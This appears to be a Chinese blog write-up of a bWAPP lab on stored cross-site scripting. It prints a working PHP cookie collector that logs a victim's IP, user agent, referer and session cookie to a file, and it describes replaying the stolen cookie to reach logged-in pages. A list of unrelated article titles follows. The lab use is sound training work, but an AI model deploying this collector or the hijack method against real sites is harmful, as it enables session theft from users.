bwapp之xss(blog)
2024-08-29 23:54:35
存储型XSS,持久化,代码是存储在服务器中的,如在个人信息或发表文章等地方,加入代码,如果没有过滤或过滤不严,那么这些代码将储存到服务器中,用户访问该页面的时候触发代码执行。这种XSS比较危险,容易造成蠕虫,盗窃cookie等。
实验内容:通过存储型xss漏洞获取用户cookie
靶机:192.168.1.104(bwapp)
客户机:192.168.1.103(win7)
存放获取cookie脚本的服务器:192.1681.109(ubuntu)
获取cookie的php文件代码:
<?php
$ip = $_SERVER['REMOTE_ADDR'];
$user_agent = $_SERVER['HTTP_USER_AGENT'];
$referer = $_SERVER['HTTP_REFERER'];
$cookie = $_GET['hack'];
$content = "ip: ".$ip."\nuser_agent: ".$user_agent."\nreferer: ".$referer."\ncookie: ".$cookie."\n";
$file = fopen("data.txt","a");
fwrite($file,$content);
fclose($file);
header("location: http://www.baidu.com");
?>
访问靶机系统:http://192.168.1.104/bWAPP/xss_stored_1.php
输入payload
用户192.168.1.103将在访问这个页面的时候向服务器提交cookie
服务器收到请求后会在当前目录创建一个名为data.txt的文件,存放获取到的内容,其文件内容为:
现在我们已经获取到了cookie,接下来可以使用cookie访问用户登录之后才可以访问到的内容
本文固定链接:http://www.cnblogs.com/hell0w/p/7528926.html 转载请注明出处,谢谢!
最新文章
- 使用VS Code开发ASP.NET 5 应用程序
- Learn GIT
- Fix failed to start session in Ubuntu
- 建立自己的git repository
- Ngrok远程桌面及ssh配置
- The Longest Increasing Subsequence (LIS)
- 安装.NET Framework组件时,电脑意外重启后再次安装失败
- android手机屏幕分辨率 及 sp dip(dp) px 区别 及高中低分辨率时处理
- Python | 基础系列 &#183; Python为什么没有switch/case语句?
- (适合入门)JVM堆内存相关的启动参数:年轻一代、岁和永久代内存分配
- Yii Framework2.0开发教程(4)在yii中定义全局变量
- 学习MQ(三) 一个实例
- 百度API获取经纬度使用
- 1. ELK 之elasticsearch 简介、获取、安装
- 浅析USB之设备枚举
- 2018-2019-2 《网络对抗技术》Exp0 Kali安装 Week1 20165301
- 菜鸟学步之 爆破AspriseOCR 4.0
- JavaScript基础函数和词法分析以及常用的内置对象和使用方法(4)
- [乱搞]hdu 6406 Taotao picks apples 笛卡尔树+倍增
- 笔记本自开wifi设置